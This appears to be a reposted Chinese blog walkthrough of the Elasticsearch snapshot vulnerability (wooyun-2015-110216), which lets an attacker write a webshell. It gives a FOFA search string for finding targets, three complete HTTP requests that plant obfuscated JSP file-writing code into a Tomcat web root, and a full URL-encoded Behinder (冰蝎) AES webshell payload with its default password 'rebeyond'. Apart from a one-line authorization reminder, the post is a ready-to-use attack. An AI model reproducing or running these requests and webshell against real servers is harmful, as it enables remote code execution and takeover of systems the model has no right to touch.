-wooyun-2015-110216 Elasticsearch写入webshell,网络安全爱好者中心-神域博客网

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现-wooyun-2015-110216 Elasticsearch写入webshell

0x01 阅读须知

资源来源于网络，安全小天地只是再次进行分享，使用请遵循本站的免责申明

0x02 漏洞描述

ElasticSearch具有备份数据的功能，用户可以传入一个路径，让其将数据备份到该路径下，且文件名和后缀都可控。所以，如果同文件系统下还跑着其他服务，如Tomcat、PHP等，我们可以利用ElasticSearch的备份功能写入一个webshell。 1.5.1及以前，无需任何配置即可触发该漏洞。之后的新版，配置文件elasticsearch.yml中必须存在path.repo，该配置值为一个目录，且该目录必须可写，等于限制了备份仓库的根位置。不配置该值，默认不启动这个功能。即使管理员配置了该选项，web路径如果不在该目录下，也无法写入webshell。

图片[1]--wooyun-2015-110216 Elasticsearch写入webshell-安全小天地

0x03 漏洞复现

漏洞影响:ElasticSearch 1.5之前的版本

FOFA:“ElasticSearch”

1.创建一个恶意索引文档：

POST /a.jsp/a.jsp/1 HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 228

{\"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>\":\"test\"}

图片[2]--wooyun-2015-110216 Elasticsearch写入webshell-安全小天地

2.再创建一个恶意的存储库，其中location的值即为要写入的路径（需要根据实际路径来判定）：

PUT /_snapshot/a.jsp HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

{
\"type\": \"fs\",
\"settings\": {
\"location\": \"/usr/local/tomcat/webapps/wwwroot/\",
\"compress\": false
}
}

图片[3]--wooyun-2015-110216 Elasticsearch写入webshell-安全小天地

3.存储库验证并创建（前三步主要是创建一个snapshot-a.jsp脚本向wwwroot下的test.jsp文件中写入任意字符串）

PUT /_snapshot/a.jsp/a.jsp HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

{
     \"indices\": \"a.jsp\",
     \"ignore_unavailable\": \"true\",
     \"include_global_state\": false
}

图片[4]--wooyun-2015-110216 Elasticsearch写入webshell-安全小天地

4.准备冰蝎的webshell进行urlEncode编码（编码地址：https://tool.chinaz.com/tools/urlencode.aspx）

图片[5]--wooyun-2015-110216 Elasticsearch写入webshell-安全小天地

5.写入冰蝎webshell，连接成功（f=后面放上webshell，连接地址:http://x.x.x.x:8080/wwwroot/test.jsp，默认密码为：rebeyond）


http://x.x.x.x:8080/wwwroot/indices/a.jsp/snapshot-a.jsp?f=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3B%2F*%E8%AF%A5%E5%AF%86%E9%92%A5%E4%B8%BA%E8%BF%9E%E6%8E%A5%E5%AF%86%E7%A0%8132%E4%BD%8Dmd5%E5%80%BC%E7%9A%84%E5%89%8D16%E4%BD%8D%EF%BC%8C%E9%BB%98%E8%AE%A4%E8%BF%9E%E6%8E%A5%E5%AF%86%E7%A0%81rebeyond*%2Fsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E

图片[6]--wooyun-2015-110216 Elasticsearch写入webshell-安全小天地 — **(注：要在正规授权情况下测试网站：日站不规范，亲人泪两行)**

------本文已结束，感谢您的阅读------

THE END